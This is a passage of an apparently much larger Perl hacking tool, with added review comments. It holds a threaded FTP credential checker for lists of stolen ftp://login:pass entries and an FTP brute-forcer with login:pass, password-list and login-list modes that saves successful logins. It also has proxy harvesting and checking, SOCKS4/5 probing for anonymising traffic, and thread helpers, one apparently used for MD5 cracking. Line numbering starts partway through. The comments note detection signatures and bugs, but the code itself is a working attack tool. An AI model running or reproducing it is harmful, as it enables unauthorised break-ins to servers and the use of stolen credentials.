                $socket->autoflush(1);
                # First response line is consumed by the outer read and not
                # kept; the rest is appended to $res.
                while (<$socket>) {
                   $res .= $_ while <$socket>;
                }
                close $socket;
                # Loose match: digit runs only, no octet/port range validation.
                my @ips = $res =~ /([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+\:[0-9]+)/g;
                my $str = 0;
                # <@ips> is the glob operator applied to the interpolated
                # list, not a filehandle read; tokens without wildcard
                # characters come back unchanged, one per iteration.
                while ( <@ips>){
                    print $_,"\n";
                    if ($_) {print FILE1 $_,"\n"}
                    $str++;
                }
                print "-----------------------------------\n";
                print "From $host - $str proxy\n";
                print "-----------------------------------\n";
            }
       } else {
            # Same fetch through the current HTTP proxy.
            if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
                print $socket "$method $current HTTP/1.$http_protocol\n";
                print $socket "Host: $host\n";
                if ($cookie) {
                    print $socket "Cookie: $cookie\n";
                }
                print $socket "Accept: */*\n";
                if ($referer) {
                    print $socket "Http-Referer: $referer\n";
                }
                if ($user_agent) {
                    print $socket "User-Agent: $user_agent\n";
                }
                print $socket "Pragma: no-cache\n";
                print $socket "Cache-Control: no-cache\n";
                print $socket "Connection: close\n\n";
                $socket->autoflush(1);
                while (<$socket>) {
                   $res .= $_ while <$socket>;
                }
                close $socket;
                my @ips = $res =~ /([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+\:[0-9]+)/g;
                my $str = 0;
                while ( <@ips>){
                    print $_,"\n";
                    if ($_) {print FILE1 $_,"\n"}
                    $str++;
                }
                print "-----------------------------------\n";
                print "From $host - $str proxy\n";
                print "-----------------------------------\n";
            }
      }
}
## FTP checker ##
# Mode 10: reads ftp://login:pass@host:port lines from $ftp_list, starts
# $thr500+1 worker threads (the range 0..$thr500 is inclusive) and waits
# for them.  Each worker takes the next index from the shared counter $num,
# opens a TCP connection, sends USER/PASS and appends the line to FILE1 when
# the reply to PASS contains "230" (RFC 959: user logged in).  Results go to
# $ftp_save in the working directory as plain text — a forensic artifact
# worth knowing about.  From the server side every attempt is one fresh
# connection with a USER/PASS pair, $pause seconds apart per thread, which
# is what FTP auth-failure logging and lockout thresholds are built to
# catch.
if ($choice == 10) {
  # Two-arg open with the mode inside the string; the result is not checked.
  open( FILE1, ">>" . $ftp_save); # ???? ??? ?????? ???????????
  print "FTP checker starting, wait please....\n";
  print "--------------------------------------\n";
  # Unchecked open; an unreadable list just yields an empty @ftp_list.
  open(FILE99, "<", $ftp_list);
  while(<FILE99>) {
    chomp;
    if ($_) {push(@ftp_list, $_);}
  }
  close(FILE99);
  $size = @ftp_list;
  $thr500 = $kol_threads; # ???-?? ???????
  # Shared work counter (declared "shared" at the top of the file); starts
  # at -1 so the first increment yields index 0.
  $num = -1; # ?? ????????
  $good = 0;
  print "Threads - $kol_threads\n";
  print "FTP file - ". $ftp_list . " [" . $size ."] records\n";
  print "FTP-good file - ". $ftp_save . "\n";
  print "FTP default port - ". $ftp_def_port . "\n";
  print "FTP timeout - ". $timeout . " sec.\n";
  print "Pause - ". $pause . " sec.\n";
  print "--------------------------------------\n";
  # Named subs exist at compile time, so gets500 can be referenced here
  # although its definition appears further down.
  for(0..$thr500) {
       $trl500[$_] = threads->create(\&gets500);
  }
  for(0..$thr500) {
       $trl500[$_]->join;
  }
  # Worker body.  Uses package globals ($current, $login, $pass, $host4,
  # $port4, $sock, $sock_res) that every thread gets its own copy of.
  sub gets500 {
            $| = 1;
            while ($num<$size) {
               { lock($num);
               $num++; }
               # NOTE(review): $num is re-read here after the lock block has
               # ended, so another thread may have advanced it in between.
               $current = $ftp_list[$num];
               # Greedy captures: a ':' or '@' inside the password makes the
               # split ambiguous.  A line that does not match leaves the
               # captures unset/stale rather than clearing them.
               $current =~ /^ftp:\/\/?(.*):(.*)\@(.*):(\d+)/img;
               $login = $1;
               $pass  = $2;
               $host4 = $3;
               $port4 = $4;
               if (!$port4) {$port4 = $ftp_def_port;}
               if ($host4) {
                   if ($sock =IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host4,PeerPort=>$port4,TimeOut => $timeout)) {
                        # Banner and the USER reply are read and discarded;
                        # only the PASS reply is inspected.  $CRLF is expected
                        # to be defined elsewhere in the file.
                        $sock_res = "";
                        $sock_res = <$sock>;
                        print $sock "USER $login" . $CRLF;
                        $sock_res = <$sock>;
                        print $sock "PASS $pass" . $CRLF;
                        $sock_res = <$sock>;
                        if ($sock_res !~ /230\s/) {
                             close($sock);
                        } else {
                             # $good is shared but incremented without a lock.
                             $good++;
                             print "                   FTP good - " . $good . "\r";
                             if ($current) {print FILE1 "  "  . $current . "\n"}
                             close($sock);
                        }
                    }
                }
               print $num . "\r";
               sleep $pause;

            }
 }
 print "----------\n";
 print "Saved in " . $ftp_save . "\n";
 close(FILE1);
 # Label defined earlier in the file (presumably the main menu).
 goto START_global;
}
## FTP bruter ##
# Mode 11: credential guessing against a single FTP server ($ftp_host on
# $ftp_def_port_b) with three sub-modes chosen from STDIN:
#   1 - login:pass pairs from $ftp_login_pass_file (split on $ftp_login_pass_del)
#   2 - fixed login $ftp_login, passwords from $ftp_pass_file
#   3 - fixed password $ftp_pass, logins from $ftp_login_file
# Each sub-mode follows the same shape as mode 10: load the list, start
# $thr500+1 threads that share the counter $num, try USER/PASS on a fresh
# connection per attempt, and treat a PASS reply containing "230" as a hit.
# A hit is written to z_<host>.txt in the working directory (plain text,
# a forensic artifact) and the worker calls exit, which with the default
# threads settings ends the whole process; the "Cant' find" lines after
# each sub-mode therefore only run when no thread matched.
# Server-side this is one login attempt per TCP connection from one source,
# $pause seconds apart per thread — the classic signature for FTP
# auth-failure alerting and lockout policies.
# Note that $choice is reused for the sub-menu, so the outer value 11 is
# overwritten once the user answers.
if ($choice == 11) {
   print "----------------------------------------------------------------------------\n";
   print "                    Choose mode:\n";
   print "----------------------------------------------------------------------------\n";
   print " [1] Login:password FTP brute - file [$ftp_login_pass_file]\n";
   print " [2] Know FTP login, brute passwords - file [$ftp_pass_file]\n";
   print " [3] Know FTP password, brute logins - file [$ftp_login_file]\n";
   print "----------------------------------------------------------------------------\n";
   $choice = <STDIN>;
   chomp $choice;
   print "Your choice: $choice\n";
   if ($choice == 1) {
        # Two-arg open, unchecked; output file name is derived from $ftp_host.
        open( FILE1, ">>" . "z_" . $ftp_host . ".txt"); # ???? ??? ?????? ???????????
        print "--------------------------------------\n";
        print "FTP bruter starting, wait please....\n";
        print "--------------------------------------\n";
        open(FILE99, "<", $ftp_login_pass_file);
        while(<FILE99>) {
           chomp;
           if ($_) {push(@ftp_login_pass_b, $_);}
        }
        close(FILE99);
        $size = @ftp_login_pass_b;
        $thr500 = $kol_threads; # ???-?? ???????
        # Shared counter; -1 so the first locked increment yields index 0.
        $num = -1; # ?? ????????
        $good = 0;
        print "Threads - $kol_threads\n";
        print "FTP login:pass file - ". $ftp_login_pass_file . " [" . $size ."] records\n";
        print "FTP save file - z_" . $ftp_host . ".txt\n";
        print "FTP host - ". $ftp_host . "\n";
        print "FTP port - ". $ftp_def_port_b . "\n";
        print "FTP timeout - ". $timeout . " sec.\n";
        print "Pause - ". $pause . " sec.\n";
        print "--------------------------------------\n";
        # Named subs exist at compile time, so gets511 is usable here.
        for(0..$thr500) {
            $trl500[$_] = threads->create(\&gets511);
        }
        for(0..$thr500) {
            $trl500[$_]->join;
        }
        # Worker for sub-mode 1.
        sub gets511 {
            $| = 1;
            while ($num<$size) {
               { lock($num);
               $num++; }
               # NOTE(review): $num is re-read outside the lock block, so a
               # neighbouring thread may have advanced it in between.
               $current = $ftp_login_pass_b[$num];
               # $ftp_login_pass_del is interpolated into the pattern
               # unescaped, so regex metacharacters in it are interpreted.
               ($login,$pass) = split(/$ftp_login_pass_del/,$current);
                   if ($sock =IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$ftp_host,PeerPort=>$ftp_def_port_b,TimeOut => $timeout)) {
                        # Banner and USER reply discarded; only the PASS reply
                        # is inspected.  $CRLF is defined elsewhere in the file.
                        $sock_res = "";
                        $sock_res = <$sock>;
                        print $sock "USER $login" . $CRLF;
                        $sock_res = <$sock>;
                        print $sock "PASS $pass" . $CRLF;
                        $sock_res = <$sock>;
                        if ($sock_res !~ /230\s/) {
                             close($sock);
                        } else {
                             print "\n ---> FIND - " . $current . "\n";
                             print FILE1 "  ftp://"  . $current . "@" . $ftp_host . ":" . $ftp_def_port_b . "\n";
                             close($sock);
                             print "----------\n";
                             print "Saved in " . "z_" . $ftp_host . ".txt\n";
                             close(FILE1);
                             # exit inside a thread terminates the whole
                             # process under the default threads settings.
                             exit;

                        }
                    }
               print $num . "\r";
               sleep $pause;

            }
       }
   print "----------\n";
   print "Cant' find...\n";
   close(FILE1);
   # Label defined earlier in the file (presumably the main menu).
   goto START_global;
   }# end choice 1
   if ($choice == 2) {
        open( FILE1, ">>" . "z_" . $ftp_host . ".txt"); # ???? ??? ?????? ???????????
        print "--------------------------------------\n";
        print "FTP bruter starting, wait please....\n";
        print "--------------------------------------\n";
        open(FILE99, "<", $ftp_pass_file);
        while(<FILE99>) {
           chomp;
           if ($_) {push(@ftp_pass_b, $_);}
        }
        close(FILE99);
        $size = @ftp_pass_b;
        $thr500 = $kol_threads; # ???-?? ???????
        $num = -1; # ?? ????????
        $good = 0;
        print "Threads - $kol_threads\n";
        print "FTP passwords file - ". $ftp_pass_file . " [" . $size ."] records\n";
        print "FTP save file - z_" . $ftp_host . ".txt\n";
        print "FTP host - ". $ftp_host . "\n";
        print "FTP port - ". $ftp_def_port_b . "\n";
        print "FTP timeout - ". $timeout . " sec.\n";
        print "Pause - ". $pause . " sec.\n";
        print "--------------------------------------\n";
        # Fixed login for this sub-mode; $login is a package global read by
        # every worker thread.
        $login = $ftp_login;
        print "--------------------------------------\n";
        print "FTP login: [$login] Start password brute... \n";
        print "--------------------------------------\n";
        for(0..$thr500) {
            $trl500[$_] = threads->create(\&gets512);
        }
        for(0..$thr500) {
            $trl500[$_]->join;
        }
        # Worker for sub-mode 2; same protocol exchange as gets511.
        sub gets512 {
            $| = 1;
            while ($num<$size) {
               { lock($num);
               $num++; }
               # NOTE(review): $num re-read outside the lock block (see gets511).
               $pass = $ftp_pass_b[$num];
                   if ($sock =IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$ftp_host,PeerPort=>$ftp_def_port_b,TimeOut => $timeout)) {
                        $sock_res = "";
                        $sock_res = <$sock>;
                        print $sock "USER $login" . $CRLF;
                        $sock_res = <$sock>;
                        print $sock "PASS $pass" . $CRLF;
                        $sock_res = <$sock>;
                        if ($sock_res !~ /230\s/) {
                             close($sock);
                        } else {
                             print "\n ---> FIND - " . $pass . "\n";
                             print FILE1 "  ftp://"  . $login . ":" . $pass . "@" . $ftp_host . ":" . $ftp_def_port_b . "\n";
                             close($sock);
                             print "----------\n";
                             print "Saved in " . "z_" . $ftp_host . ".txt\n";
                             close(FILE1);
                             # Ends the whole process (default threads settings).
                             exit;
                        }
                   }
               print $num . "\r";
               sleep $pause;

            }
       }
   print "----------\n";
   print "Cant' find...\n";
   close(FILE1);
   goto START_global;
   }# end choice 2
   if ($choice == 3) {
        open( FILE1, ">>" . "z_" . $ftp_host . ".txt"); # ???? ??? ?????? ???????????
        print "--------------------------------------\n";
        print "FTP bruter starting, wait please....\n";
        print "--------------------------------------\n";
        open(FILE99, "<", $ftp_login_file);
        while(<FILE99>) {
           chomp;
           if ($_) {push(@ftp_login_b, $_);}
        }
        close(FILE99);
        $size = @ftp_login_b;
        $thr500 = $kol_threads; # ???-?? ???????
        $num = -1; # ?? ????????
        $good = 0;
        print "Threads - $kol_threads\n";
        print "FTP logins file - ". $ftp_login_file . " [" . $size ."] records\n";
        print "FTP save file - z_" . $ftp_host . ".txt\n";
        print "FTP host - ". $ftp_host . "\n";
        print "FTP port - ". $ftp_def_port_b . "\n";
        print "FTP timeout - ". $timeout . " sec.\n";
        print "Pause - ". $pause . " sec.\n";
        print "--------------------------------------\n";
        # Fixed password for this sub-mode; $pass is a package global read by
        # every worker thread.
        $pass = $ftp_pass;
        print "--------------------------------------\n";
        print "FTP pass: [$pass] Start login brute... \n";
        print "--------------------------------------\n";
        for(0..$thr500) {
            $trl500[$_] = threads->create(\&gets513);
        }
        for(0..$thr500) {
            $trl500[$_]->join;
        }
        # Worker for sub-mode 3; same protocol exchange as gets511.
        sub gets513 {
            $| = 1;
            while ($num<$size) {
               { lock($num);
               $num++; }
               # NOTE(review): $num re-read outside the lock block (see gets511).
               $login = $ftp_login_b[$num];
                   if ($sock =IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$ftp_host,PeerPort=>$ftp_def_port_b,TimeOut => $timeout)) {
                        $sock_res = "";
                        $sock_res = <$sock>;
                        print $sock "USER $login" . $CRLF;
                        $sock_res = <$sock>;
                        print $sock "PASS $pass" . $CRLF;
                        $sock_res = <$sock>;
                        if ($sock_res !~ /230\s/) {
                             close($sock);
                        } else {
                             print "\n ---> FIND - " . $login . "\n";
                             print FILE1 "  ftp://"  . $login . ":" . $pass . "@" . $ftp_host . ":" . $ftp_def_port_b . "\n";
                             close($sock);
                             print "----------\n";
                             print "Saved in " . "z_" . $ftp_host . ".txt\n";
                             close(FILE1);
                             # Ends the whole process (default threads settings).
                             exit;
                        }
                   }
               print $num . "\r";
               sleep $pause;

            }
       }
   print "----------\n";
   print "Cant' find...\n";
   close(FILE1);
   goto START_global;
   }# end choice 3

}
  10611. ## PROXY checker ##
  10612. if ($choice == 12) {
          # Mode 12: proxy liveness check. Reads host:port lines from the file named
          # by $proxy_list into @proxy_list and, for each entry, attempts a plain TCP
          # connect; every entry that connects is counted in the shared $good and
          # appended to $proxy_save. No request is sent, so this only shows that the
          # port accepts connections, not that a proxy is answering on it.
  10613.   open( FILE1, ">>" . $proxy_save); # results file, appended; open() result is not checked
  10614.   print "PROXY checker starting, wait please....\n";
  10615.   print "--------------------------------------\n";
  10616.   open(FILE100, "<", $proxy_list); # open() result is not checked
  10617.   while(<FILE100>) {
  10618.     chomp;
  10619.     if ($_) {push(@proxy_list, $_);} # blank lines are skipped
  10620.   }
  10621.   close(FILE100);
  10622.   $size = @proxy_list;
  10623.   $thr501 = $kol_threads; # number of threads
  10624.   $num = -1; # do not change: shared index, the first locked increment yields 0
  10625.   $good = 0;
  10626.   print "Threads - $kol_threads\n";
  10627.   print "PROXY file - ". $proxy_list . " [" . $size ."] records\n";
  10628.   print "PROXY-good file - ". $proxy_save . "\n";
  10629.   print "PROXY timeout - ". $timeout . " sec.\n";
  10630.   print "Pause - ". $pause . " sec.\n";
  10631.   print "--------------------------------------\n";
  10632.   for(0..$thr501) { # 0..N inclusive: $kol_threads + 1 workers
  10633.        $trl501[$_] = threads->create(\&gets501);
  10634.   }
  10635.   for(0..$thr501) {
  10636.        $trl501[$_]->join;
  10637.   }
          # Worker body (a package-level sub despite its placement inside the block).
  10638.   sub gets501 {
  10639.             $| = 1;
  10640.             while ($num<$size) {
  10641.                { lock($num);
  10642.                $num++; } # the index is read again below, outside the lock
  10643.                $current_proxy = $proxy_list[$num];
  10644.                ($current_proxy_host,$current_proxy_port) = split(/:/,$current_proxy);
                       # NOTE(review): IO::Socket::INET documents the option keys 'Proto'
                       # and 'Timeout'; 'PeerProto' and 'TimeOut' are not those keys, so
                       # the protocol falls back to the default (tcp) and no connect
                       # timeout is applied here.
  10645.                if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
  10646.                              $good++; # shared counter, incremented without lock()
  10647.                              print "                   PROXY good - " . $good . "\r";
  10648.                              if ($current_proxy) {print FILE1 "  "  . $current_proxy . "\n"}
  10649.                              close($sock); # NOTE(review): closes $sock, not the $socket opened above; the test connection is only dropped when $socket is reassigned
  10650.                }
  10651.             }
  10652.                print $num . "\r"; # after the loop: runs once per worker, not once per entry
  10653.                sleep $pause;
  10654.  
  10655.  }
  10656.  print "----------\n";
  10657.  print "Saved in " . $proxy_save . "\n";
  10658.  close(FILE1);
  10659.  goto START_global; # back to the main menu (label defined elsewhere in the file)
  10660. }
  10661. ## Proxy grabber ##
  10662. if ($choice == 13) {
          # Mode 13: proxy list harvesting. Each line of $proxy_site_list is a URL;
          # workers extract its host part into the global $host and call grab_proxy()
          # (defined elsewhere), which presumably appends what it finds to FILE1
          # ($proxy_list) -- confirm, as this block itself never writes to FILE1.
  10663.   open( FILE1, ">>" . $proxy_list); # results file, appended; open() result is not checked
  10664.   open(FILE, "<", $proxy_site_list); # open() result is not checked
  10665.   while(<FILE>) {
  10666.       chomp;
  10667.       if ($_) {push(@proxy_grab, $_);} # blank lines are skipped
  10668.   }
  10669.   close(FILE);
  10670.   $size = @proxy_grab;
  10671.   print "Sites with proxy - $size\n";
  10672.   print "--------------------------\n";
  10673.   $thr = $kol_threads; # number of threads
  10674.   $num = -1; # do not change: shared index, the first locked increment yields 0
  10675.   for(0..$thr) { # 0..N inclusive: $kol_threads + 1 workers
  10676.         $trl[$_] = threads->create(\&gets3000);
  10677.   }
  10678.   for(0..$thr) {
  10679.         $trl[$_]->join;
  10680.   }
          # Worker body (a package-level sub despite its placement inside the block).
  10681.   sub gets3000 {
  10682.         $| = 1;
  10683.         while ($num<$size) {
  10684.             { lock($num);
  10685.             $num++; }
  10686.             $current = $proxy_grab[$num];
  10687.             $current =~ /^http:\/\/?([^\/]+)/i; # captures up to the next "/"; the match result is not checked, so on a miss $1 keeps its previous value
  10688.             $host = $1;
  10689.             $content = grab_proxy(); # return value is stored but not used here
  10690.             print $num . "\r";
  10691.             sleep $pause;
  10692.         }
  10693.      }
  10694.      print "----------\n";
  10695.      print "Saved in " . $proxy_list . "\n";
  10696.      close(FILE1);
  10697.      goto START_global; # back to the main menu (label defined elsewhere in the file)
  10698. }
  10699.  
  10700. exit if $choice == 14; # mode 14: leave the program
  10703. sub gets1000 {
          # Thread fan-out helper: starts two workers (0..$thr1 with $thr1 = 1) that
          # loop on the shared counter $num1 until it reaches $bl_lenght, call
          # get_res() (defined elsewhere) for every index they claim, echo the result
          # and collect it in %hash keyed by index. The per-thread hashes are merged
          # into %res, which is returned by reference. %res, %hash, $thr1, @trl1, $ii
          # and $data are package globals; $bl_lenght is set elsewhere.
          # NOTE(review): gets1001 is a named sub, so it closes over the $num1 of the
          # first call only (Perl warns "Variable will not stay shared"); a later call
          # of gets1000 resets a fresh $num1 that the workers do not read.
  10704.                    my $num1 : shared;
  10705.                    $thr1 = 1;
  10706.                    $num1 = 0;
  10707.                    %res = ();
  10708.                    for(0..$thr1) {
  10709.                       $trl1[$_] = threads->create(\&gets1001);
  10710.                    }
  10711.                    for(0..$thr1) {
  10712.                       %res = (%res, %{$trl1[$_]->join}); # later keys overwrite earlier ones
  10713.                    }
  10714.                    sub gets1001 {
  10715.                           $| = 1;
  10716.                           $ii = 0;
  10717.                           while ($num1 < $bl_lenght) {
  10718.                             { lock($num1);
  10719.                             $num1++; }
  10720.                             $ii = $num1; # read outside the lock: may already have been advanced by another worker
  10721.                             $data = get_res(); # presumably picks up the index via the global $ii -- confirm
  10722.                             $hash{$ii} = $data; # %hash is not :shared, so each thread fills its own copy
  10723.                             print $data;
  10724.                           }
  10725.                           return \%hash
  10726.                   }
  10727.                   return \%res;
  10728.             }
  10729. sub gets1005 {
  10730.  
          # Thread fan-out helper: starts eleven workers (0..$thr2 with $thr2 = 10)
          # that loop on the shared counter $num2 until it reaches $bl_lenght and, for
          # every index claimed, call get_res() when $bl_mode is 0 and get_res1()
          # otherwise (both defined elsewhere). Results are echoed, collected per
          # thread in %hash1 keyed by index, merged into %res1 and returned by
          # reference. %res1, %hash1, $thr2, @trl2, $ii, $data2, $bl_mode and
          # $bl_lenght are package globals.
          # NOTE(review): gets1006 is a named sub and closes over the $num2 of the
          # first call only (Perl warns "Variable will not stay shared").
  10731.                    my $num2 : shared;
  10732.                    $thr2 = 10;
  10733.                    $num2 = 0;
  10734.                    %res1 = ();
  10735.                    for(0..$thr2) {
  10736.                       $trl2[$_] = threads->create(\&gets1006);
  10737.                    }
  10738.                    for(0..$thr2) {
  10739.                       %res1 = (%res1, %{$trl2[$_]->join}); # later keys overwrite earlier ones
  10740.                    }
  10741.                    sub gets1006 {
  10742.                           $| = 1;
  10743.                           $ii = 0;
  10744.                           while ($num2 < $bl_lenght) {
  10745.                             { lock($num2);
  10746.                             $num2++; }
  10747.                             $ii = $num2; # read outside the lock: may already have been advanced by another worker
  10748.                             if ($bl_mode==0){
  10749.                                 $data2 = get_res();
  10750.                             } else {
  10751.                                 $data2 = get_res1();
  10752.                             }
  10753.                             $hash1{$ii} = $data2; # %hash1 is not :shared, so each thread fills its own copy
  10754.                             print $data2;
  10755.                           }
  10756.                           return \%hash1
  10757.                   }
  10758.                   return \%res1;
  10759.  
  10760.             }
  10761. sub md5 {
          # Thread fan-out helper: starts eleven workers (0..$thr3 with $thr3 = 10)
          # that loop on the shared counter $num3 until it reaches $bl_lenght, call
          # md5_turbo() (defined elsewhere) for every index claimed, echo the result
          # and collect it in %hash2 keyed by index; the per-thread hashes are merged
          # into %res2 and returned by reference.
          # NOTE(review): this sub sets the package global $num4 to 0 but the workers
          # count on the lexical $num3, which is never initialised here (it starts
          # undef and numifies to 0). As with the other fan-out helpers, gets1008 is
          # a named sub and closes over the $num3 of the first call only.
  10762.                    my $num3 : shared;
  10763.                    $thr3 = 10;
  10764.                    $num4 = 0;
  10765.                    %res2 = ();
  10766.                    for(0..$thr3) {
  10767.                       $trl3[$_] = threads->create(\&gets1008);
  10768.                    }
  10769.                    for(0..$thr3) {
  10770.                       %res2 = (%res2, %{$trl3[$_]->join}); # later keys overwrite earlier ones
  10771.                    }
  10772.                    sub gets1008 {
  10773.                           $| = 1;
  10774.                           $ii = 0;
  10775.                           while ($num3 < $bl_lenght) {
  10776.                             { lock($num3);
  10777.                             $num3++; }
  10778.                             $ii = $num3; # read outside the lock: may already have been advanced by another worker
  10779.                             $data3 = md5_turbo();
  10780.                             $hash2{$ii} = $data3; # %hash2 is not :shared, so each thread fills its own copy
  10781.                             print $data3;
  10782.                           }
  10783.                           return \%hash2
  10784.                   }
  10785.                   return \%res2;
  10786.             }
  10787. sub TURBO {
          # Thread fan-out helper: starts eleven workers (0..$thr4 with $thr4 = 10)
          # that loop on the shared counter $num4 until it reaches $bl_lenght, call
          # get_res() (defined elsewhere) for every index claimed, echo the result
          # and collect it in %hash4 keyed by index; the per-thread hashes are merged
          # into %res4 and returned by reference. Same structure as gets1000 with
          # more workers.
          # NOTE(review): gets1009 is a named sub and closes over the $num4 of the
          # first call only (Perl warns "Variable will not stay shared").
  10788.                    my $num4 : shared;
  10789.                    $thr4 = 10;
  10790.                    $num4 = 0;
  10791.                    %res4 = ();
  10792.                    for(0..$thr4) {
  10793.                       $trl4[$_] = threads->create(\&gets1009);
  10794.                    }
  10795.                    for(0..$thr4) {
  10796.                       %res4 = (%res4, %{$trl4[$_]->join}); # later keys overwrite earlier ones
  10797.                    }
  10798.                    sub gets1009 {
  10799.                           $| = 1;
  10800.                           $ii = 0;
  10801.                           while ($num4 < $bl_lenght) {
  10802.                             { lock($num4);
  10803.                             $num4++; }
  10804.                             $ii = $num4; # read outside the lock: may already have been advanced by another worker
  10805.                             $data4 = get_res();
  10806.                             $hash4{$ii} = $data4; # %hash4 is not :shared, so each thread fills its own copy
  10807.                             print $data4;
  10808.                           }
  10809.                           return \%hash4
  10810.                   }
  10811.                   return \%res4;
  10812.             }
  10813. sub socks_check {
             # Tries every "host:port" line of $socks_file, first as SOCKS5 and then
             # as SOCKS4 with a 5-second connect timeout, and returns "host:port:5" or
             # "host:port:4" for the first proxy whose CONNECT to $check_url:80 is
             # granted and that then sends any data back. Falls off the end (returns
             # an empty list / undef) when no proxy qualifies. Writes the package
             # globals $check_port, $check_host, $sk4_conn, $sk5_conn0, $sk5_conn1,
             # $sokcs_flag, $res and $temp.
  10814.      $check_port = 80;
  10815.      $check_host = $check_url; # assumes $check_url is a bare host name -- gethostbyname() cannot resolve a full URL; confirm
  10816.      my $check_hostent = gethostbyname ($check_host); # scalar context: packed 4-byte IPv4 address, undef when the lookup fails
             # SOCKS4 CONNECT request: VN=4, CD=1, DSTPORT, DSTIP, empty USERID + NUL.
  10817.      our $sk4_conn = "\x04"
  10818.                    . "\x01"
  10819.                    . pack ('n', $check_port)
  10820.                    . $check_hostent
  10821.                    . "\x00";
             # SOCKS5 greeting: VER=5, one method offered, method 0 = no authentication.
  10822.      our $sk5_conn0 = "\x05"
  10823.                    . "\x01"
  10824.                    . "\x00";
             # SOCKS5 CONNECT request: VER=5, CMD=1, RSV=0, ATYP=1 (IPv4), DST.ADDR, DST.PORT.
  10825.      our $sk5_conn1 = "\x05"
  10826.                     . "\x01"
  10827.                     . "\x00"
  10828.                     . "\x01"
  10829.                     . $check_hostent
  10830.                     . pack ('n', $check_port);
  10831.      my @proxies;
  10832.      open(FILE, "<", $socks_file); # open() result is not checked
  10833.      while(<FILE>) {
  10834.          chomp;
  10835.          push(@proxies, $_); # blank lines are kept, unlike the other list readers in this file
  10836.      }
  10837.      close(FILE);
  10838.      foreach my $proxy (<@proxies>) { # NOTE(review): <...> around an array is the glob operator, not a plain list; `foreach my $proxy (@proxies)` is the usual form
  10839.          $sokcs_flag = 0;
  10840.          my ($s_host, $s_port) = split (/:/, $proxy);
  10841.          print $proxy . " - Trying SOCKS 5\n";
  10842.          $res = socks5($s_host,$s_port,5);
  10843.          if ($res->{'code'} == 0) {
  10844.              $sokcs_flag = 5;
  10845.              $temp = $s_host . ":". $s_port . ":" . $sokcs_flag;
  10846.              return $temp;
  10847.          }
  10848.          if ($sokcs_flag == 0) { # always true here: a SOCKS5 success has already returned
  10849.              print $proxy . " - Trying SOCKS 4\n";
  10850.              $res = socks4($s_host,$s_port,5);
  10851.              if ($res->{'code'} == 0) {
  10852.                  $sokcs_flag = 4;
  10853.                  $temp = $s_host . ":". $s_port . ":" . $sokcs_flag;
  10854.                  return $temp;
  10855.              }
  10856.          }
  10857.      }
             # The four helpers below are package-level subs (Perl does not nest named
             # subs). socks_get, later in this file, defines subs with the same four
             # names, so these are redefined ("Subroutine redefined" under warnings)
             # and the later bodies are the ones that actually run.
             # send_query: write the given payload and read until EOF or a read error.
             # No read timeout is applied here. Its callers pass the package global
             # $query, which is not assigned anywhere visible, so in practice an empty
             # payload goes out and the "response" is whatever the peer sends unprompted.
  10858.      sub send_query {
  10859.           my ($sock, $query) = @_;
  10860.           syswrite $sock, $query, length $query;
  10861.           my ($resp, $buf);
  10862.           $resp .= $buf while sysread $sock, $buf, 4098;
  10863.           return $resp;
  10864.      }
             # parse_content: wrap a raw response as {code, message} -- code 0 with the
             # data when anything came back, -1 with an empty message otherwise.
  10865.      sub parse_content {
  10866.           my $content = shift;
  10867.           my %ret;
  10868.           if ($content) {
  10869.                ($ret{'code'}, $ret{'message'}) = (0, $content);
  10870.           } else {
  10871.                ($ret{'code'}, $ret{'message'}) = (-1, "");
  10872.           }
  10873.           return \%ret;
  10874.      }
             # socks4: connect to the proxy, send $sk4_conn, validate the 8-byte reply
             # (VN 0 or 4, CD 0x5a = request granted), then relay via send_query and
             # return parse_content()'s {code, message}. Every failure returns a hash
             # with a negative code; on those early returns the lexical $sock is closed
             # when it goes out of scope.
  10875.      sub socks4 {
  10876.           my ($proxy_host, $proxy_port, $timeout1) = @_;
  10877.           my $sock = IO::Socket::INET->new (
  10878.                       'PeerAddr' => $proxy_host,
  10879.                       'PeerPort' => $proxy_port,
  10880.                       'Proto' => 'tcp',
  10881.                       'Timeout' => $timeout1
  10882.                       ) or return {'code' => -1, 'message' => "Connection error: $@"};
  10883.           syswrite $sock, $sk4_conn, length $sk4_conn;
  10884.           my $resp;
  10885.           sysread $sock, $resp, 8; # the proxy's reply must be 8 bytes long
  10886.           return {'code' => -1, 'message' => 'Empty response'}
  10887.           if length $resp == 0 or not defined $resp;
  10888.           return {'code' => -1, 'message' => 'Too short response from proxy'} if length $resp < 8;
  10889.           my @bytes = unpack 'C*', $resp;
  10890.           @bytes = map {sprintf '%.2x', $_} @bytes; # hex rendering of the reply; computed but never used
  10891.           my $code = ord (substr $resp, 0, 1); # VN byte
  10892.           return {'code' => -2, 'message' => 'Not Socks4 proxy'} unless $code == 0 or $code == 4;
  10893.           $code = ord (substr $resp, 1, 1); # CD byte
  10894.           return {'code' => -3, 'message' => 'Request rejected'} unless $code == 0x5a;
  10895.           undef $resp;
  10896.           $resp = send_query ($sock, $query); # $query is the unassigned package global
  10897.           return {'code' => -5, 'message' => 'Cannot connect to check URL. Please check it'}
  10898.           unless $resp =~ /200 OK/ or defined $resp; # NOTE(review): "or defined $resp" means this only returns for an undefined $resp; a defined reply without "200 OK" passes through
  10899.           my $ret = parse_content ($resp);
  10900.           close $sock;
  10901.           return $ret;
  10902.      }
             # socks5: send the greeting and expect VER=5 / METHOD=0, send the CONNECT
             # request and expect REP=0 with a non-zero BND.ADDR, then relay via
             # send_query exactly as socks4 does.
  10903.      sub socks5 {
  10904.           my ($proxy_host, $proxy_port, $timeout1) = @_;
  10905.           my $sock = IO::Socket::INET->new (
  10906.                       'PeerAddr' => $proxy_host,
  10907.                       'PeerPort' => $proxy_port,
  10908.                       'Proto' => 'tcp',
  10909.                       'Timeout' => $timeout1
  10910.                       ) or return {'code' => -1, 'message' => "Connection error: $@"};
  10911.           syswrite $sock, $sk5_conn0, length $sk5_conn0;
  10912.           my $resp;
  10913.           sysread $sock, $resp, 2; # method-selection reply: VER, METHOD
  10914.           return {'code' => -1, 'message' => 'Too short first response from server'} if length $resp < 2;
